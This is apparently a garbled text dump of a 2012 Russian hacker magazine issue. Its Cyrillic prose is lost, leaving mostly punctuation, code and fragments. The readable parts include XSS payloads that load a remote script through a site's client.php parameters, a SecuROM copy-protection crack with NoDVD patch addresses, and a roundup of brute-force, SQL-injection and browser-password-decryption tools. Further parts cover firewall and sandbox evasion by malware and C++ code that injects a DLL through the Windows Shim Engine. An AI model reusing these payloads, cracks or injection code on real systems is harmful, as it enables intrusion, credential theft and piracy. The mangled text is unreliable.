, , ? , . ID JS. ,
.
, ID
//
:).
.
, ,
Charles (charlesproxy.com ,
- ). , . IE
ieHTTPHeaders,
.
ieHTTPHeaders :
POST /client.php
xjxfun=changeChack&xjxargs[]=***18&xjxargs[]=***39&
xjxargs[]=120.0
: 1 , 2
, 3 .
GET-
. , . , ,
JS ? ,
}{0@): - -?
? !.
- ?
, .
html- : js/func.js. ,
,
.
saveNewPass() ID+JS.
, . , , ,
. , (
)? ,
IP
!
, , ,

.
066
Basic Authentication. ,
. ,
,
, ,
...
IT , .
, ,
:).

, , , - .
, ID, .
. ,

, ,
-. ,
, . ,
.
, : e-mail
?. : + IP. ,
. :
<a href="JavaScript: edit_post(***01, ***1)"
class=z11><font class=z11></font></a>
, 3, ,
! , ,
. , ,
. , ,
. , !
.
,
:
<script language='JavaScript' src='js/hd.js'></script>
, js/hd.js
04 /159/ 2012
. showTiket(n).
, .
, ,
. , IP!
,
,
, , : (...) , ,
. ! ,
.
XSS?
, , , . .
, XSS.
, ( ).
,
, , (e-mail,
SMS-)
. , ,
/ , e-mail
.
:
<script src="http://***/o.js" type="text/javascript" >
</script>
,
e-mail. , IE ,
ieHTTPHeaders:
POST /client.php HTTP/1.1
...
xjxfun=saveEmail&xjxr=1328363403426&xjxargs[]=TEST
xjxfun=saveTel&xjxr=1328363361153&xjxargs[]=000000000000
xjxfun=saveSMSTel&xjxr=1328363389834&
xjxargs[]=000000000000
xjxr, GET-,
, . e-mail:
/client.php?xjxfun=saveEmail&xjxargs[]=
</script>
o.js alert(XSS);. !
.

alert. XSS ?
, .
:
/client.php?xjxfun=saveTel&xjxargs[]=000000000000
</script>
/client.php?xjxfun=saveSMSTel&xjxargs[]=000000000000
</script>
! ,
, - . , , , 260 , .

IT- , 2008 .

.
, . ,

,
, . ,
. z
XSS
04 /159/ 2012
067
elf (icq: 7719116)

cj (icq: 3708307)
DVD
SecuROM
v7.33.17
, OllyDbg
-7, Xcode injection
,
, ,

OEP.

068
-

:

Tiberium Wars
Command & Conquer
Electronic Arts.
Sony Digital Audio Disc Corporation
(SONY DADC), ,
, SecuROM,
.
:

;
SecuROM_7 Profiler
v1.0;

SecuROM 7
& VM;
X-code
injection (txt-bin);
X-code
injection
!
SecuROM
,
(exelab.ru
). ,
Sony ,
Protection Technology
,
04 /159/ 2012
,
.
. ,

. ! ,
OEP
. , ,
SecuROM 7.33.
7.3x , (
: <space for rent>
You Are Now Entering a
Restricted Area).
,
.
! !
KeBugCheckEx.

.
, ,

, :).
WHAT IS TARGET
. , Tiberium Wars ( 1.9),
OllyDbg 1.10 OllyDmp
( ) OllyDbg 2.0
- .
,
,
.
, .
.

CNC3.exe: , Microsoft C++ 7.0,
.text, .rdata , ,

. , Daemon
Tools ,

, , .

CnC, , CNC3.exe
WinAPI CreateProcess
.dat (
Microsoft PE EXE format) . ,
\RetailExe\1.9\cnc3game.
dat.
.securom , .
F9
.
,
API-, ProcMon ,

04 /159/ 2012
WindowsNT\CurrentVersion\Windows\AppInit.
, ,
. ?
,
, ,
.
, CreateFile, FindWindow
.
;
. ,

.
,
( ).
, (
, , ). .
, CNC3.exe
Microsoft C++ 7.0. ,
cnc3game.dat . :
OEP

. !

: ,
. ,
,
, , ,
(
).
,
,
X- .
, X- ,

.
:
1. On-line patching. WinAPI
ReadProcessMemory/WriteProcessMemory
/
. , ,
NtExplorer
AsPack 2.11c,
. Themida
.
2. Offline patching. .
, ,
.

.
,

GetCommandLine/GetFilePath
.
3. Dll-hijacking. ,
,
(,
DllMain),

.

004626FAh.
004784B8h
, .
, API (GetSystemTimeAsFileTime,
GetCurrentProcessId).
: GetSystemTimeAsFileTime
X-, ,

OEP ,
,
.
SecuROM 7.33
WinAPI,
,
.
! .
.est
asm-,
.
,
HKLM\Software\Microsoft\
004628DA
004628DF
CALL 004784B8
JMP 004626FA
069

. :
GetSystemTimeAsFileTime
. ,
( , .text)
, . , ,
kernel32.
text ( ), 2k3
PeTools Write,

! , ,
WinAPI VirtualProtect, .
.

. , large
integer ACSIIZ- ( ltoa
), MessageBox,

WinAPI. ,

CreateThread 00F9AD0E,
. , ,
! -.
. MessageBox
: 00DDCE77, 76B414D4, 7C34207B,
0040A5AE -! ,
.text! We need attach
now! 1.10,
, . ,
OEP (
0040A2C7). ,
(VM) -
, (
SONY DADC) OEP

. ,
? SecuROM v7.33 Virtual Machine,
, !
SECUROM V7 VIRTUAL MACHINE

Sony DADC :
OEP
,
.
, ,
! ,
VM,
,
,
, ,
VM, ,
MOV EAX, 1; CPUID;
MOV AL, CURRENT_CPUID_KEY_
DELTA_DECODE 254 .
070
LINK
bit.ly/x4iBzF

SecuROM
7.30.

,

,

.

VM

,
VM
.
bit.ly/xG9Lry
NoDVD CnC3:
Tiberium Wars v1.9.
.memory
.

, SONY DADC
!
,
.
VM
,

,
SecuROM v7.3x VM
,
- . :

(LPDWORD VOID) .
.
-, , ,

( spin- JMP EAX),
, , ,
.
REP
.
MOV
MOV
MOV
STOS DWORD PTR ES:[EDI]

DWORD PTR DS:[EBX+4],EAX
EAX,DWORD PTR SS:[ESP]
DWORD PTR DS:[EBX+8],EAX
MOV
MOV
MOV
MOV
DWORD PTR DS:[EBX+0C],EDX

BYTE PTR DS:[EBX+10],95
DWORD PTR DS:[EBX+14],EBX
DWORD PTR DS:[EBX+1C],ESP
, ,
,
VM. ,
VM 90% ! -, ,
copy/paste. -,
CPU . ,

! , , ROL- (crypt-byte),
,
255
,

. , ,
-
.
VM ?
04 /159/ 2012
, !
, .
( 2),
. 2

,
,
.
(, 1),
(offset 00B93AFC), VM. EAX
- (0790A442),
.
(0790A442)
, EAX 1,
,
(offset 00B93AFC). , ,
. ,
VM : -
MOV
MOV
MOV
AND
MOV
ECX,
ECX,
EAX,
EAX,
ECX,
DWORD PTR SS:[EBP+8]

DWORD PTR DS:[ECX]
DWORD PTR SS:[EBP+0C]
ECX
EAX
NOP
.
VM, ( ).
1 1.
, ,
VM
WinAPI, ( ,
-,
).
WinAPI , : SetUnhandledExceptionFilter,
SecuROM v7.33.017 , X-
GetModuleFileNameA, DeleteFileA, GlobalFree.

VM CALL EAX,
.

WinAPI. (

10k). :
1. . ,

,
.
!
2. 255 (
1
50),
++ ,
,
VM
(XOR SecretDATA,
43E2AB9D) .
.
1 VM: CALL ANY_OFFSET JMP DWORD
PTR DS:[ ] JMP [VM_VIRTUAL_ADDRESS] VM.

VM .
, JMP DWORD
PTR DS:[ ]
. ,
, VM, ,
(LPDWORD
VOID). VM

!
VM
,
, ,
. , !
, ,
1 1,
3k, 2 30k.

.

,
0044F4D2
0044F4D8
00482DE5
00482DEF
DEC DWORD PTR DS:[158297A]

JE NODVD.00482DE5
MOV DWORD PTR DS:[158297A],18D
JMP NODVD.0044F4DE
Sony
DADC. .
OEP ! VM xD
04 /159/ 2012
SONY
DADC ( )!
][. z
071
X-Tools

:
slider
URL:
bit.ly/yMgiB6
:
*nix/win
:
garinn
URL:
ripper.zu8.ru
:
Windows
:
The SX Team
URL:
bit.ly/ht8krs
:
Windows
- ADSL-
BVSCANNER

SQL-
BVScanner (Black Vlastelin Scanner)

,
Perl.

ADSL-.
.
,

accounts.txt.
SQLRipper
,
,
SQL MySQL MSSQL.
:
( :) .

. ? , ,
! Browser Password Decryptor.

: Firefox, Internet
Explorer, Google Chrome, Google Chrome Canary,
Opera Browser, Apple Safari, Flock Browser.
:
perl bvscanner.pl
> IP-
> IP-
, ,

.

:

;
;
PPTP-VPN ,
;
,
,
, .
072
:

;
;
SQL-;
SELECT c ORDER BY,
GROUP BY, UNION SELECT;
;
IDS;

.dbf;
XML-;
.dbf.
,

(bit.ly/ydHA2o) ,

.
:
command-line GUI- ;

;
;

;
HTML/XML/Text;
Portable,
.
: BrowserPasswordDecryptor.exe
<output_file path>.
04 /159/ 2012
X-Tools
:
Mesut Timur
URL:
code.google.com/p/
finddomains
:
*nix/win
FINDDOMAINS
FindDomains
.

, ,
,
, IP-
( ).
FindDomains ,

.
Bing,
-
:
The SX Team
URL:
bit.ly/ihELsw
:
Windows
:
Anton Keks
URL:
angryip.org
:
*nix/win/mac
4
ANGRY IP SCANNER

,
Angry IP Scanner ( ipscan).

IP-
.

,
, MAC-,
.
, (
java) .

NetBIOS ( ,
Windows-),
-, CSV-, TXT- XML- .
,

(, 192.168.0.1 192.168.0.255)

, .
,

.
04 /159/ 2012
Bing
Developers. :
binged.it/6Acq5, ID
appid.
txt, .
:
1000 Bing;

DNS;
;
Mono.
:
FindDomains.exe www.google.com
:
s3my0n
URL:
bit.ly/w87YuA
:
*nix/win
5
PE-

PE-.
-
GUI-,
. ExeScan
Python, .

.

, ,
, nonascii/ .
:
PE;
;
API ;
PE ;

.
PEFile
. . : exescan.
py -a <path to exe file.
6
EXPLOIT-DB.COM

,

exploit-db.com.
getsploits (,
) !
/
-/
,
.
:
o: ;
q: ;
h: .
:
--author: ;
--platform: ( 47 );
--type:
--osvdb: OSVDB- ;
--cve: CVE- .
:
getsploits.py -o linux_shellcode.txt
--type shellcode
getsploits.py -o freebsd_x86-64_local.
txt --platform 10
getsploits.py --author maxe vbulletin
073
MALWARE
(drobotun@xakep.ru)
074
? . , :

drive-by
,

(

).
!

:

04 /159/ 2012
NDIS-, Avast

,
.
. ,
,
.
, ?
,
?
,
. , ,
,
. , ,

, ,
, .
, . ,
, , ( ,

).

:) .
,
, ,
.

, .

: , , ,
. ,
, ,

, .
IoCreateDevice DrWeb, TdiRegisterDeviceObject tdi.sys
04 /159/ 2012

Windows .
ws_32.dll,
Winsock (send, recv,
connect ). (
) ,
,
,
.
-
,
,
, -, ws_32.dll,
, ,

.
ws_32.dll afd.sys
(Ancillary Function Driver for WinSock ),

( ,
). ,
ws_32.dll afd.sys. ,
afd.sys ws_32.dll
msafd.dll .
,
,
afd.sys, .
,
tcpip.sys,
tcp/ip.
( ) TDI
(Transport Data Interface ). ,
, nwlnkipx.sys, ipx.
inf- klim6.sys
075
MALWARE
NDIS- Comodo () OutPost FireWall Pro 7.0 ()

\Device\RawIp, \Device\Udp \
Device\Tcp ( IPv6 \Device\
RawIp6, \Device\Udp6, \Device\Tcp6 ).
IoAttachDevice,
,
IoCreateDevice ,
.
. ,

, Dr.Web,
tcpip.
sys.

TdiRegisterDeviceObject tdi.sys, .
, ,
NDIS (Network Driver Interface
Specification
).
BHO Internet Explorer
076
,
, NDIS-, ,
.

. .
( Microsoft )
NDIS Intermediate Driver
( NDIS).
( ) , ndis.sys.
Filter Hook Driver (
) kernelmode ,
IP. Microsoft

. -
, -
.

(, ,
,
, -
).

,
,
, .
NDIS- :
, Windows XP,
(NDIS 5),
NDIS- Windows
Vista (NDIS 6).

-. ,
,
,
, NDIS. ,

, ,

. : ,
, ,
(
),
( ).
-
,

, ,
inf- -
04 /159/ 2012
.
- inf-
: -,

, -, . ,
, , .

NDIS- ,
,
NDIS-.
, ,

NdisOpenAdapter NdisRegisterProtocol.
,
, , . ,
, Comodo,

NDIS- NdisOpenAdapter, NdisRegisterProtocol,
NdisCloseAdapter NdisDeregisterProtocol.

NdisOpenAdapter,
.
, - ,
.

, NDIS, .

, - java-
(
drive-by

Java- http-
04 /159/ 2012
,

,
) .

. BHO
(Browser Helper Object
). BHO
dll-, Internet
Explorer. , BHO

, .
BHO , ,
- .
, , , BHO Internet
Explorer? -,
. -,
( ) ,
,

.

-
, ,
,
.
, -
Java-, -
.
,
, ,
.
-
, ,
.
, ,
,
-,
,
,
.

( ). , html- , iframe (,

).
(
),
Java- Trojan-Downloader.Js.Agent.
ghd (, , )
077
MALWARE
WWW
NDIS
vitki.net/
ru/story/vvedenie-vndis ( )
msdn.microsoft.
com/en-us/library/
ff564881 ()
DVD

.
Java- ,

. ,
iframe .
,
,

.
Java- ,
DLL- jscript.dll.
%windir%\system32, COM- IE JS. Windows GUID ( )
COM-
Jscript. {f414c260-6ac0-11cfb6d1-00aa00bbbb58}, {f414c261-6ac0-11cfb6d1-00aa00bbbb58} {f414c262-6ac0-11cfb6d1-00aa00bbbb58}.
, ,

JavaScript. ,
jscript.dll.
,
.
,
, ,
JavaScript- Windows.
ntdll.dll, SandboxIE
( SbieDLL.dll)

. ,
,
.
,
.
.

.

. ,

.

. , ,
,
.
,
.
,
. -

078
, (SandboxIE,
BufferZone,
Kaspersky Internet Security, Comodo Internet
Security Pro, Avast Internet Security).

,
.
,
- .

. Windows User
Account Control (
Windows).
, ,

SandboxIE.

,
, ( ).
.
,

. ,

/ - ,
- , .
,

.
,
, , -
04 /159/ 2012
. , SandboxIE
56 ntdll.dll, 68
user32.dll, 71 advapi32.dll, 6 kernel32.dll 1 ws_32.dll.

, .

.

, .
SandboxIE, BufferZone.

SandboxIE
.
( Kaspersky
Internet Security Comodo Internet Security
Pro).
,

.

.

. , SandboxIE
( ) ,
.
Comodo Internet
Security

.

.
,
,
- ,

, . ,
, - ,

,
. z
SandboxIE ( drive , )
INFO

, ,
-
.
,

.
,
,

.
-. Microsoft Security Essential
DSS (Dynamic Signature
Service).
( ,
),
, ,

Microsoft DSS, SpyNet MRS (Microsoft Reputation Services).
, ,
04 /159/ 2012
, .

, ,
.
Comodo
,

.

,
Kaspersky Security Network. KSN ,

-,
. KSN

-,
, (

) -,
KSN -.

,

. ,

, :
Program
Files, Windows,
Users\%AllUsersProfile%\Program
Data, Documents
and Setting
HKLM\
Software.

Java-

JavaScript:

][
2011 .
079
MALWARE
deeonis (deeonis@gmail.com)
,
,
. ,
.
,
,
.

,

. , ,
, .
,

,
.
,

,
.
, . : Kaspersky CRYSTAL, Dr.Web Security
Space, ESET NOD32 Smart Security 5 Avira Free
Antivirus.
(, , )
.

Avira ,

-
080
.
,

IE6,
web-.

Windows XP sp3 ,
,

,
.

,
.

.
-
-
hex-
.
swf-, Visual Basic Script,
Java-, exe-
( UPX) lpe, pdf,

zip-. .

.

.
, , .
.
,
. ,
.

, ,
, .
, Avira Free Antivirus.
,
,

,
.
04 /159/ 2012
Dr.Web
Kaspersky : total detection
, ,
.
,
.
. ,

Scan.
, ,
.
Avira , DR/
Delphi.Gen. ,

,
. , , ,
. 1/10 , ,
- .
Dr.Web Security Space.

. ,
, .
DR/Delphi.Gen,
Trojan.MulDrop.20121. ,

,
. 20121, ,
,
20992 .
,
04 /159/ 2012
, ,
, .
.

pdf,
(Exploit.PDF.2633),
Flash Exploit.SWF.193. ,
swf-,
.
,
- ,
. Avira Free
Antivirus ,
(, ,
).
,
. Trojan.
MulDrop.20121
.
, Dr.Web
, , ,

. Kaspersky
CRYSTAL. , ,
,
.

,
.
, ,
,
.
DR/Delphi.Gen,
(HEUR:Trojan.Win32.
Generic). -
. pdf-,
,
HEUR:Exploit.Script.Generic. ,
,
,
, .
,
,
,
2/10.
NOD32.

. , , ,
exe-,
.
Win32/Injector.FP. ,
, ,
: 1 10
.

, ,
,
.

. , ,
081
MALWARE
NOD32 Avira
Avira Free Antivirus
NOD32
. ,
,

. ,
Avira pdf-,
,
. JS, ,

, HTML/Dlcr.
Dawn.C.2. exe, swf-
.
Avira Free Antivirus .
Dr.Web. ,
.
:
,
Trojan.SMSSend.1950. .
.
,
,
-
,
.
Kaspersky Crystal ,

,

. ,
, , ,

.
ESET NOD32 , . ,
, exe-,
.

.
Avira ESET ( ,
,
).

, ,

600%
,
.
, 10/10
. ,
( ),

.
Dr.Web
:
.
,
, .
-,

. z
,
,
,
.

?
,
.

, .
.
VBS,
. ,
, , CVE201-0611. -, ,
JS, .
winlocker' , ,
082
.
,
, .
,
( -
).
PDF-,
- drive-by . ,
,
, flash-,
.
04 /159/ 2012
Preview
088
TRUE-

,
.

TrueCrypt,
.
,
,
.

,
. ,
- .
084
SHIM:
. Shim Engine,
.
UNIXOID
106

Linux
2.6
sysfs.
?
SYN\ACK
122

HOWTO:

Samba.
04 /159/ 2012
111

Android ,
firmware
CyanogenMod MIUI.
FERRUM
128

Microsoft
. 2012.
139

, ,
.
.
083
TSS (TSS_TSS@mail.ru)
SHIM:

SHIM ENGINE

, dll,
dll redirection, ,
apc LoadLibrary. ,
. ? .
SHIM ?
Shim Engine
Windows , dll, PE-
ntdll.dll.

:
some.exe
Windows95
Windows 95
? , ,
dll ,
- . -
084
some.exe.
Windows
API.
,
PEB,
Heap Managera.
, , ,
ADVAPI32.DLL:
RegConnectRegistryA, RegConnectRegistryW, RegOpenKeyExA,
RegOpenKeyExW, RegQueryValueExW,RegCloseKey,
RegOpenKeyW, RegQueryValueA, RegQueryValueW,
RegCreateKeyA, RegCreateKeyW, RegCreateKeyExA,
RegCreateKeyExW, RegEnumValueA, RegEnumValueW,
RegEnumKeyA, RegEnumKeyW, RegEnumKeyExA, RegEnumKeyExW,
RegQueryInfoKeyA, RegQueryInfoKeyW, RegSetValueExA,
RegSetValueExW, RegDeleteKeyA, RegDeleteKeyW
04 /159/ 2012
Shim:
EMET
, Shim Engine ,
.
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\
CurrentVersion\AppCompatFlags\Layers]
"C:\\Documents and Settings\\Admin\\ \\test.
exe"="WIN2000"

,
.
SHIMENG_DEBUG_LEVEL 4
(
).
(
, test.exe)
, , Windows 2000 WinDbg,
. , :
[INFO] [SeiSetLayerEnvVar] Env var set __COMPAT_LAYER="Win2000"
...
[INFO] [SE_DllLoaded] INIT. loading DLL "AcLayers.DLL".
...
[MSG ] [SeiInit] Shim DLL 0x71660000 "C:\WINDOWS\AppPatch\
AcLayers.DLL" loaded
[MSG ] [SeiInit] Using SHIM "Win2000VersionLie!AcLayers.DLL"
...
[INFO] [SeiInit] GetHookAPIs returns 3 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "Win2000VersionLie"
[MSG ] [SeiInit] Using SHIM "VirtualRegistry!AcLayers.DLL"
[MSG ] [SeiInit] Command line for Shim "VirtualRegistry" :
"WIN2K"
WINDOWS\AppPatch\AcLayers.DLL" SHIM "VirtualRegistry"
[MSG ] [SeiInit] Using SHIM "DuplicateHandleFix!AcLayers.DLL"
WINDOWS\AppPatch\AcLayers.DLL" SHIM "DuplicateHandleFix"
[INFO] [SE_DllLoaded] INIT. loading DLL "AcGenral.DLL".
...
[MSG ] [SeiInit] Using SHIM "LoadLibraryCWD!AcGenral.DLL"
WINDOWS\AppPatch\AcGenral.DLL" SHIM "LoadLibraryCWD"
[MSG ] [SeiInit] Using SHIM "Win2kPropagateLayer!AcLayers.DLL"
WINDOWS\AppPatch\AcLayers.DLL" SHIM "Win2kPropagateLayer"
, Win2000,
shim dll C:\WINDOWS\ AppPatch\ AcLayers.DLL.
,
Vir tualRegistr y, DuplicateHandleFix ,
( ,
).
:
04 /159/ 2012
, , test.exe Win2000. , ,
. .
,
(!) .
. , , .
AppCompatFlags . .

, , Shim Engine shimeng.dll apphelp.dll, sysmain.
sdb drvmain.sdb ( \WINDOWS\AppPatch),
dll ,
PE-
Windows. , ntdll.dll. ,
, ,
Shim Engine, ,
apc-.

PE-:
_LdrpInitializeProcess:
.text:7C921B36
mov
.text:7C921B3C
mov
...
.text:7C921B62
lea
.text:7C921B68
mov
...
.text:7C921B87
mov
...
loc_7C921693:
eax, large fs:18h ; TEB

ebx, [eax+30h] ; PEB
eax, [ebx+1E8h] ; peb->pShimData
ecx, [eax]
[ebp+var_104], ecx
...
.text:7C921693
mov
edi, [ebp+var_104]
.text:7C921699
xor
esi, esi
.text:7C92169B
cmp
edi, esi
.text:7C92169D
jz
loc_7C923CD0
; ULONG peb->pShimData == 0,
; (
; )
085

s = idautils.Strings( False )
s.setup( strtypes = Strings.STR_UNICODE | Strings.STR_C )
for i, v in enumerate( s ):
if v is None:
print( "Failed on %d" % i )
else:
print( "%x => %s" % ( v.ea, str( v ) ) )
print "Script Started..."
EnumStrings()
print "Script Ended..."
idautils.Strings(False)
True, , default_setup = False setup .
IDA ,
:
5d0749b0 -> \Registry\Machine\Software\Microsoft\Windows
NT\CurrentVersion\AppCompatFlags\InstalledSDB
xref SdbResolveDatabase, DatabasePath

DatabaseType. , ( !) ,
GUID ( ,
).
, {GUID} (DatabasePath
DatabaseType)
.
WinDbg
.text:7C9216A3
.text:7C9216A4
.text:7C9216AA
.text:7C9216B0
.text:7C9216B1
;
push
edi
push
[ebp+var_D8]
mov
[ebx+1ECh], esi
push
edi
call
_LdrpLoadShimEngine@12

LdrpLoadShimEngine
shimeng.dll.
LdrpLoadShimEngine dll,
(LdrpGetShimEngineInterface),
(SdbInitDatabase), (SdbUnpackAppCompatData)
. , shimeng.dll. dll ,
, -
, ,
? . (IdaPython):
import idaapi
import idautils
import idc
def EnumStrings():
086
, , , , .
, , , .
, - ?
, !
- ,
, . , , EMET (goo.gl/9Dn5L). ,
Process Monitor ,
, EMET, C:\
Program Files\EMET\EMET_GUI.exe, Configure Apps,
test.exe, EMET.
, EMET C:\WINDOWS\
AppPatch\Custom\{f8c4cc07-6dc4-418f-b72b-304fcdb64052}.
sdb, dll C:\WINDOWS\AppPatch\EMET.dll.
. SOFTWARE\\Microsoft\\
Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\test.
exe , ,
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\
AppCompatFlags\\InstalledSDB\\{f8c4cc07-6dc4-418f-b72b304fcdb64052}.
, Layers, Custom. .
hex-, emet.dll test.dll. test.dll C:\WINDOWS\AppPatch\. test.exe
, test.dll test.exe.
vmmap (goo.gl/SsSQn)
. test.exe vmmap dll, mission
complete!
04 /159/ 2012
Shim:

, ,
dll ( ,
. ):
#include <windows.h>
#include <iostream>
#define GUID L"{f8c4cc07-6dc4-418f-b72b-304fcdb64052}"
#define SHIM_REGKEY L"SOFTWARE\\Microsoft\\Windows NT\\
CurrentVersion\\AppCompatFlags "
BOOL RegisterShimDll()
{
HKEY key;
BOOL funcResult = FALSE;
wchar_t dbPath[] = L"C:\\Windows\\AppPatch\\Custom\\"
GUID L".sdb";
DWORD dbType = 0x10000;
DWORD64 sdb = 0x1cc8828b2208e82;
// Custom AppCompatFlags
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
SHIM_REGKEY L"\\Custom", 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL,
&key, NULL);
RegCloseKey(key);
//
SHIM_REGKEY L"\\Custom\\test.exe",
0, NULL, REG_OPTION_NON_VOLATILE,
KEY_WRITE, NULL, &key, NULL);
RegSetValueEx(key, GUID L".sdb", 0,
REG_QWORD, (PBYTE)&sdb, sizeof(DWORD64));
RegCloseKey(key);
SHIM_REGKEY L"\\InstalledSDB",
0, NULL, _OPTION_NON_VOLATILE, KEY_WRITE, NULL,
&key, NULL);
RegCloseKey(key);
SHIM_REGKEY L"\\InstalledSDB\\" GUID,
0, NULL, REG_OPTION_NON_VOLATILE,
Dll
KEY_WRITE, NULL, &key, NULL);

RegSetValueEx(key, L"DatabasePath", 0,
REG_SZ, (BYTE*)dbPath, sizeof(dbPath));
RegSetValueEx(key, L"DatabaseType", 0, REG_DWORD,
(PBYTE)&dbType, sizeof(DWORD));
RegCloseKey(key);
return TRUE;
}
BOOL CopyShimFiles()
{
CreateDirectory(L"C:\\Windows\\AppPatch\\Custom", NULL);
CopyFile( GUID L".sdb",
L"C:\\Windows\\AppPatch\\Custom\\" GUID L".sdb",
TRUE );
CopyFile( L"test.dll",
L"C:\\Windows\\AppPatch\\test.dll", TRUE );
return TRUE;
}
int main()
{
CopyShimFiles();
RegisterShimDll();
std::cout << "Shim inject complete... " << std::endl;
std::cout << "Run test.exe and use vmmap.exe to see
test.dll in AP test.exe" << std::endl;
SHIMENG.DLL
shimeng.dll :
SE_DllLoaded dll;
SE_DllUnloaded dll;
SE_DynamicShim ;
SE_GetProcAddress GetProcAddress;
SE_InstallAfterInit
;
SE_InstallBeforeInit ,
;
SE_IsShimDll dll;
SE_ProcessDying ,
, dll
DLL_PROCESS_DETACH.
04 /159/ 2012
return 0;
}
shim engine ,
.
-, .
-, , , explorer.exe,
.
-,
,
. z
087
Johnny Catch (johnny.catch@gmail.com)
TRUE

TRUECRYPT
, -
,
TrueCrypt.
,
,

. ,
.
TrueCrypt
, ,
.

, .
,
, .
,
. ,
TrueCrypt.
TrueCrypt
088
, , .
,
truecrypt.org (
7.0a). MS Visual Studio 2010 ( ,
04 /159/ 2012
True-
.
128 128, 192 256 . 256- .

TrueCrypt :
,
,
.
BelT :
void belt_init(unsigned __int8 * k, int kLen,
unsigned __int8* ks)
{
for(i = 0; i<32; ++i) ks[i] = k[i];
}
BelT
MS VS 2008 SP1). 16-

Microsoft, MS Visual C++
1.52. MSDN,
:). , 16-
,

- .
, Visual C++ 1.52
.
NASM, gzip, WinDDK, PKSC#11 ( RSA Data Security).
,
.
:
1. MSVC16_ROOT , MSVC15,
Microsoft Visual C++ 1.52;
2. WINDDK_ROOT , , WinDDK;
3. PKCS11_INC , PKCS#11.
PATH, exe NASM gzip. .
PATH
, C:\ gzip.exe. , . ,
TrueCrypt: ,
Visual Studio ( ), All Build. ,
Release TrueCrypt.
.

BelT,
04 /159/ 2012
,
, ,
(
TrueCrypt MAX_KEY_LENGTH
key schedule ,
TrueCrypt).
belt_init .
-, ,
32 , kLen ( assert).

. Cold
Boot Attack,

,
.
(
). ,
:
// (SBox)
unsigned __int8 H[256] = {...};
//
unsigned int KeyIndex[8][7] = {...};
H , ( 34.101.31-2011), . :
#define HU1(x,H) (((unsigned __int32) (H)[ U1((x)) ]) < < 24)
#define HU2(x,H) (((unsigned __int32) (H)[ U2((x)) ]) << 16)
#define HU3(x,H) (((unsigned __int32) (H)[ U3((x)) ]) << 8)
XTS
XTS
TrueCrypt. ,
XEX, 2003
. , XEX
,
XTS . 2010 XTS
NIST
. 2007
IEEE (IEEE 1619). XTS
.
089

#define HU4(x,H) (((unsigned __int32) (H)[ U4((x)) ]))
#define G(x,H,r) RotHi(HU4((x),(H)) | HU3((x),(H)) \
| HU2((x),(H)) | HU1((x),(H)),(r))
HU
DWORD, G
. (
).
:
void belt_encrypt
(
unsigned __int8 *ks,
unsigned __int8 * inBlock,
unsigned __int8 * outBlock
);
.
DWORD,

, , . BelT
28147-89.

TrueCrypt.
TRUECRYPT
, MSVS 2010 TrueCrypt
Crypto,
, .
BelT. (, Mount)
Crypto.h :
enum {
NONE = 0,
AES,
...
};

.
BELT, #ifndef TC_WIN...,
TrueCrypt

. , key schedule ( ,
, ,
32 ):
#define BELT_KS 32
#ifdef TC_WINDOWS_BOOT_
SINGLE_MODE.
key shedule ,
.
:
#elif defined(TC_WINDOWS_BOOT_BELT)
#define MAX_EXPANDED_KEY BELT_KS
#endif
include BelT (#include "Belt.h"). Crypto.h

.
Crypto.c, Ciphers[] Cipher.
#ifndef TC_WIN... :
{ BELT, "BelT ( 34.101.31)", 16, 32, BELT_KS },
34.101.31-2011
BelT,
34.101.31-2011, ,
. Belt
128 128, 192 256
.
28147-89

2^32, (
)
.
: , Belt
SP-.
,
:
2^32, XOR, .
090
,
. 128
32- , .
K , 56
. 256-
(k[1],..., k[8]) :
K[1]=k[1], ..., K[8]=k[8], K[9]=k[1], ..., K[56]=k[8]
.
1,
i. G 32-
H
.
.
04 /159/ 2012
True-
BelT
XTS
Cipher
, , , key shedule .
EncryptionAlgorithms[]
EncryptionAlgorithm. -
, TC_WINDOWS_BOOT,
.
( ):
34.101.31 (
),
XTS, CRC32 .
,
.
{{ BELT, 0 }, {XTS, 0, 0, 0}, 1}
(
),
XTS (
), ,
(
TrueCrypt).
.
CipherInit, ,
,
. key
schedule , ,
:
case BELT:
belt_init(key, ks);
break;
EncipherBlock
( ),
DecipherBlock ( ). , (
),
Belt.
, ,
, TrueCrypt,
bootloadera
BelT.
,
( ).
,
: ,
04 /159/ 2012
28147-89
TrueCrypt ,

XTS ,
128 , 64
. , ,
.
, 128 64-
, (
, ).
, ,
. ,
!
TrueCrypt
TrueCrypt, truecrypt,
truecrypt.org (
). ,
,
TrueCrypt PlainCrypt, http://
localhost/.
, Win7/Vista x64
. ,
, .
, , Microsoft,
.
HAPPY END
, , . , ,
. z
091
(ivinside.blogspot.com)

,

092

,

.
04 /159/ 2012
,
, ,
None, .
>>> a = ["a","b","c"]
>>> b = [1, 2]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None}
:
def dictify(a, b):
# , ,
#
if len(b) > len(a):
return {}
#
# zip dict
dic = dict(zip(a, b))
# ,
if len(b) < len(a):
for i in xrange(len(b), len(a)):
dic[a[i]] = None
return dic
, Python 2.2 dict,

for:
keys = ['a', 'b', 'c']
vals = [1, 2, 3]
dic = {}
for (k, v) in zip(keys, vals) dic[k] = v

map,
. None, zip,

None. :
def dictify(a, b):
if len(b) > len(a):
return {}
dic = dict(map(None, a, b))
return dic
>>> myappend(**a)
:
[1, 2, 3, 0]
[0]
[0, 0]
[1, 2, 3] .
, ,

a, 0.
,
myappend(), .
myappend(*a) :
AttributeError: 'int' object has no attribute 'append',
,
.
:
a = [[1, 2], 3]
myappend(*a)
# :
# myappend([1, 2], 3)
myappend(**a) , : TypeError: myappend() keywords must be strings.

, , -, , :
,
:
a = {'a':[1, 2], 'num':3}
myappend(**a)
# :
# myappend([1, 2], 3)
, .
>>> a = Keeper()
>>> b = Keeper()
>>> for i in Keeper.list_instances():
...
print i
<Keeper instance at 0x...
:
def myappend(a = [], num = 0):
a.append(num)
print a

:
>>>
>>>
>>>
>>>
>>>
>>>
a = [1, 2, 3]
myappend(a)
myappend()
myappend()
a = {1:2, 3:4}
myappend(*a)
04 /159/ 2012

Python. , ,

. :
def f(...):
...
f = staticmethod(f)
@staticmethod
def f(...):
...
093

staticmethod,
,
, . (
instances):
class Keeper:
instances = []
def __init__(self):
self.instances.append(self)
@staticmethod
def list_instances():
return Keeper.instances
a = Keeper()
b = Keeper()
